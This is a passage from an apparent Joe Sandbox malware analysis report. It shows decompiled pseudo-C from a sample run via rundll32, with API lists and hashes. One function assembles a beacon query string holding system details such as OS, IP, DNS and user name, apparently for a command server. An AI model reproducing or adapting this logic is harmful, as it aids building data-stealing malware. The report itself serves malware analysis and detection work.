				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04354CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x04357bb3
                                          0x04357bba
                                          0x04357bbb
                                          0x04357bbc
                                          0x04357bbd
                                          0x04357bc3
                                          0x04357bc8
                                          0x04357bc8
                                          0x04357bd2
                                          0x04357be4
                                          0x04357beb
                                          0x04357c19
                                          0x04357bed
                                          0x04357bef
                                          0x04357bf4
                                          0x04357c16
                                          0x04357bf6
                                          0x04357bf9
                                          0x04357c00
                                          0x04357c05
                                          0x04357c07
                                          0x04357c07
                                          0x04357c0c
                                          0x04357c0c
                                          0x04357bf4
                                          0x04357c20

                                          APIs
                                            • Part of subcall function 0435642C: SysFreeString.OLEAUT32(?), ref: 0435650B
                                            • Part of subcall function 04354CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0435358E,004F0053,00000000,?), ref: 04354CDC
                                            • Part of subcall function 04354CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0435358E,004F0053,00000000,?), ref: 04354D06
                                            • Part of subcall function 04354CD3: memset.NTDLL ref: 04354D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04357C0C
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 14e595628955b8cf2c2ccdce2e774858b78fce0444e46356545fb3bdb34b6d0c
                                          • Instruction ID: 03f32d9e0d623184a4cff7bf78fd86e6d1829480684f978c99fc62df8ebffdab
                                          • Opcode Fuzzy Hash: 14e595628955b8cf2c2ccdce2e774858b78fce0444e46356545fb3bdb34b6d0c
                                          • Instruction Fuzzy Hash: A3019A3250051ABFDB02AFA8CC04EAABBB8EF48204F005421ED05E7070E371EA628B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043558BE, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E043558BE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x435d238, 0, _a4); // executed
				return _t2;
			}




                                          0x043558ca
                                          0x043558d0

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 80a50da1bf623821dacf45549defa0b3387cff2061f436a233aba983288c678f
                                          • Instruction ID: cfa935ba16348856bc4bd25210e9429a50a1397ad1151545426d7bd3575ede09
                                          • Opcode Fuzzy Hash: 80a50da1bf623821dacf45549defa0b3387cff2061f436a233aba983288c678f
                                          • Instruction Fuzzy Hash: 7DB01231000300EBDA014B00ED08F15BB6DEB58700F01E010B2001447083358C20EB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04359347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E04359347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x435d330;
				E0435684E();
				while(1) {
					_t8 = E043532BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E0435A5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x435d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E0435684E();
					if(_t19 != 0) {
						_t22 =  *0x435d338; // 0x6879b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x0435934f
                                          0x04359353
                                          0x04359354
                                          0x04359355
                                          0x0435935a
                                          0x0435935f
                                          0x04359366
                                          0x0435936d
                                          0x00000000
                                          0x00000000
                                          0x0435936f
                                          0x04359374
                                          0x04359375
                                          0x0435937c
                                          0x04359396
                                          0x00000000
                                          0x0435937e
                                          0x0435937e
                                          0x04359380
                                          0x04359383
                                          0x04359387
                                          0x00000000
                                          0x00000000
                                          0x04359389
                                          0x04359387
                                          0x0435939e
                                          0x0435939e
                                          0x043593a0
                                          0x043593a7
                                          0x043593a9
                                          0x043593af
                                          0x043593b6
                                          0x043593c6
                                          0x043593be
                                          0x043593c1
                                          0x043593c1
                                          0x043593c9
                                          0x043593c9
                                          0x043593d2
                                          0x043593d2
                                          0x0435939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0435684E: GetProcAddress.KERNEL32(36776F57,0435935F), ref: 04356869
                                            • Part of subcall function 043532BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 043532E5
                                            • Part of subcall function 043532BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04353307
                                            • Part of subcall function 043532BA: memset.NTDLL ref: 04353321
                                            • Part of subcall function 043532BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0435335F
                                            • Part of subcall function 043532BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04353373
                                            • Part of subcall function 043532BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 0435338A
                                            • Part of subcall function 043532BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04353396
                                            • Part of subcall function 043532BA: lstrcat.KERNEL32(?,642E2A5C), ref: 043533D7
                                            • Part of subcall function 043532BA: FindFirstFileA.KERNEL32(?,?), ref: 043533ED
                                            • Part of subcall function 0435A5E9: lstrlen.KERNEL32(?,00000000,0435D330,00000001,0435937A,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?), ref: 0435A5F2
                                            • Part of subcall function 0435A5E9: mbstowcs.NTDLL ref: 0435A619
                                            • Part of subcall function 0435A5E9: memset.NTDLL ref: 0435A62B
                                          • HeapFree.KERNEL32(00000000,0435D00C,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?,0435D00C,?,?), ref: 04359396
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: b57ecbbca46f6a1072395a3f6486262cf00fc809251a533fcebb06a661f751ab
                                          • Instruction ID: c71229166d383084e18f059897b8a3d42b514b93183953ab2e4ad32d9771ae60
                                          • Opcode Fuzzy Hash: b57ecbbca46f6a1072395a3f6486262cf00fc809251a533fcebb06a661f751ab
                                          • Instruction Fuzzy Hash: 8B01D2B5310205EAEB105EA6DD80F7E77ADEF44368F443035AD48C60B0D664AC819261
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04351B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04351B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E04357BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E043574B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x435d238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x04351b1b
                                          0x04351b72
                                          0x04351b77
                                          0x04351b1d
                                          0x04351b37
                                          0x04351b3b
                                          0x04351b40
                                          0x04351b42
                                          0x04351b54
                                          0x04351b60
                                          0x04351b44
                                          0x04351b44
                                          0x04351b49
                                          0x04351b4e
                                          0x04351b4e
                                          0x04351b42
                                          0x04351b3b
                                          0x04351b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,0435690C,?,004F0053,06879388,00000000,?), ref: 04351B60
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: bd1936f0b89d96e85db3577a74f9134c959c0549e9048635b2b6afd716e4db1d
                                          • Instruction ID: 2337e603760cd2e3431168f8582d3dc42628aab65d68cfe04ffd221c5360ee91
                                          • Opcode Fuzzy Hash: bd1936f0b89d96e85db3577a74f9134c959c0549e9048635b2b6afd716e4db1d
                                          • Instruction Fuzzy Hash: 42016D32500609FBDF219F94DC05FAA3B69EF08360F089029FE199A270E730A920DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435A872, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0435A872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                          0x0435a872
                                          0x0435a87f
                                          0x0435a880
                                          0x0435a881
                                          0x0435a888
                                          0x0435a8b6
                                          0x0435a8b7
                                          0x0435a8ba
                                          0x0435a8c0
                                          0x00000000
                                          0x00000000
                                          0x0435a89f
                                          0x0435a8a9
                                          0x0435a8b0
                                          0x00000000
                                          0x0435a8a1
                                          0x0435a8a4
                                          0x0435a8c4
                                          0x0435a8a6
                                          0x0435a8a6
                                          0x00000000
                                          0x0435a8a6
                                          0x0435a8a4
                                          0x0435a8cb
                                          0x0435a8d1
                                          0x0435a8d1
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 431d9349aa7c3612daed380c60e21fd7a0b68fe27bacf9c9d10729a738b05772
                                          • Instruction ID: d25edbc386d677330325f96052623f3c7558bccef8525bd483cffdfe9e31228e
                                          • Opcode Fuzzy Hash: 431d9349aa7c3612daed380c60e21fd7a0b68fe27bacf9c9d10729a738b05772
                                          • Instruction Fuzzy Hash: DCF03C71D01218EFDB00EB94C488EEDBBB8EF04304F1491AAE902A7250D3B46B85DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043560CF, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E043560CF(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E04357A28(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E0435147E(_a4);
				}
				return _t13;
			}





                                          0x043560db
                                          0x043560e0
                                          0x043560e4
                                          0x043560eb
                                          0x043560f6
                                          0x043560fa
                                          0x043560fa
                                          0x04356103

                                          APIs
                                            • Part of subcall function 04357A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04357A5E
                                            • Part of subcall function 04357A28: memset.NTDLL ref: 04357AD3
                                            • Part of subcall function 04357A28: memset.NTDLL ref: 04357AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04359F9F,?,?,04359C62,00000002,?,?,?), ref: 043560EB
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: f53ed8d6048b1c8d649dd3d0b4839e92b0eabbebe0181ea8a9f570635608313b
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 60E0C2B750012977DB222E94DC01EEFBF6CCF526E1F005020FE0C9A225DA31EA6093E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0435514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E0435514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x435d018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0x435d014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x435d010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x435d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x435d2a4; // 0x251a5a8
				_t3 = _t31 + 0x435e633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x435d02c,  *0x435d004, _t26);
				_t34 = E043557AB();
				_t35 =  *0x435d2a4; // 0x251a5a8
				_t4 = _t35 + 0x435e673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E043573E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x435d2a4; // 0x251a5a8
					_t6 = _t86 + 0x435e8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x435d238, 0, _t99);
				}
				_t100 = E0435614A();
				if(_t100 != 0) {
					_t81 =  *0x435d2a4; // 0x251a5a8
					_t8 = _t81 + 0x435e8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x435d238, 0, _t100);
				}
				_t101 =  *0x435d324; // 0x68795b0
				_a32 = E0435757B(0x435d00a, _t101 + 4);
				_t43 =  *0x435d2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x435d2a4; // 0x251a5a8
					_t11 = _t77 + 0x435e8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x435d2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x435d2a4; // 0x251a5a8
					_t13 = _t74 + 0x435e8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x435d238, 0, 0x800);
					if(_t103 != 0) {
						E0435749F(GetTickCount());
						_t51 =  *0x435d324; // 0x68795b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x435d324; // 0x68795b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x435d324; // 0x68795b0
						_t106 = E04354D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x435c294);
							_t63 =  *0x435d2a4; // 0x251a5a8
							_push(_t106);
							_t15 = _t63 + 0x435e252; // 0x616d692f
							_t65 = E04359DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E0435666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E04356106();
								}
								HeapFree( *0x435d238, 0, _v48);
							}
							HeapFree( *0x435d238, 0, _t106);
						}
						HeapFree( *0x435d238, 0, _t103);
					}
					HeapFree( *0x435d238, 0, _a24);
				}
				HeapFree( *0x435d238, 0, _t108);
				return _a12;
			}

















































                                          0x0435514f
                                          0x0435514f
                                          0x0435514f
                                          0x04355154
                                          0x0435515a
                                          0x04355164
                                          0x04355166
                                          0x04355166
                                          0x04355173
                                          0x0435517e
                                          0x04355181
                                          0x0435518c
                                          0x0435518f
                                          0x04355194
                                          0x04355197
                                          0x0435519c
                                          0x0435519f
                                          0x043551ab
                                          0x043551b8
                                          0x043551ba
                                          0x043551c0
                                          0x043551c5
                                          0x043551d0
                                          0x043551d2
                                          0x043551d5
                                          0x043551dc
                                          0x043551e0
                                          0x043551e2
                                          0x043551e7
                                          0x043551f3
                                          0x043551f5
                                          0x04355201
                                          0x04355203
                                          0x04355203
                                          0x0435520e
                                          0x04355212
                                          0x04355214
                                          0x04355219
                                          0x04355225
                                          0x04355227
                                          0x04355233
                                          0x04355235
                                          0x04355235
                                          0x0435523b
                                          0x0435524e
                                          0x04355252
                                          0x04355259
                                          0x0435525c
                                          0x04355261
                                          0x0435526c
                                          0x0435526e
                                          0x04355271
                                          0x04355271
                                          0x04355273
                                          0x0435527a
                                          0x0435527d
                                          0x04355282
                                          0x0435528c
                                          0x0435528e
                                          0x04355296
                                          0x043552af
                                          0x043552b3
                                          0x043552bf
                                          0x043552c4
                                          0x043552cd
                                          0x043552de
                                          0x043552e2
                                          0x043552eb
                                          0x043552f1
                                          0x043552fe
                                          0x0435530b
                                          0x04355311
                                          0x0435531d
                                          0x04355323
                                          0x04355328
                                          0x04355329
                                          0x04355330
                                          0x04355335
                                          0x0435533b
                                          0x04355341
                                          0x04355348
                                          0x0435534f
                                          0x04355355
                                          0x0435535c
                                          0x04355360
                                          0x0435536b
                                          0x04355370
                                          0x04355376
                                          0x0435537f
                                          0x0435537f
                                          0x04355390
                                          0x04355390
                                          0x0435539f
                                          0x0435539f
                                          0x043553ae
                                          0x043553ae
                                          0x043553c0
                                          0x043553c0
                                          0x043553cf
                                          0x043553e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04355166
                                          • wsprintfA.USER32 ref: 043551B3
                                          • wsprintfA.USER32 ref: 043551D0
                                          • wsprintfA.USER32 ref: 043551F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04355203
                                          • wsprintfA.USER32 ref: 04355225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04355235
                                          • wsprintfA.USER32 ref: 0435526C
                                          • wsprintfA.USER32 ref: 0435528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 043552A9
                                          • GetTickCount.KERNEL32 ref: 043552B9
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 043552CD
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 043552EB
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?,068795B0), ref: 04354D57
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(?,?,?,043552FE,?,068795B0), ref: 04354D5F
                                            • Part of subcall function 04354D2C: strcpy.NTDLL ref: 04354D76
                                            • Part of subcall function 04354D2C: lstrcat.KERNEL32(00000000,?), ref: 04354D81
                                            • Part of subcall function 04354D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,043552FE,?,068795B0), ref: 04354D9E
                                          • StrTrimA.SHLWAPI(00000000,0435C294,?,068795B0), ref: 0435531D
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?,00000000,00000000,04355335,616D692F,00000000), ref: 04359DFB
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?), ref: 04359E03
                                            • Part of subcall function 04359DEF: lstrcpy.KERNEL32(00000000,?), ref: 04359E1A
                                            • Part of subcall function 04359DEF: lstrcat.KERNEL32(00000000,?), ref: 04359E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04355348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0435534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 0435535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04355360
                                            • Part of subcall function 0435666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04356720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04355390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 0435539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,068795B0), ref: 043553AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 043553C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 043553CF
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 905ad691f27a6713d50bf86e023c676f8b95fbb580828656de12ef8e1f40fead
                                          • Instruction ID: f97bcc8362e7856baa2b8d44b1557634d63279106df8b02ed9297969e970830f
                                          • Opcode Fuzzy Hash: 905ad691f27a6713d50bf86e023c676f8b95fbb580828656de12ef8e1f40fead
                                          • Instruction Fuzzy Hash: A7618A71500301AFE711ABA8EC88F6A7BECEF4C358F056114F909DB260DB29ED06DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435ADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E0435ADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4350000;
				_t115 = _t139[3] + 0x4350000;
				_t131 = _t139[4] + 0x4350000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4350000;
				_v16 = _t139[5] + 0x4350000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4350002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x435d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x435d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x435d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
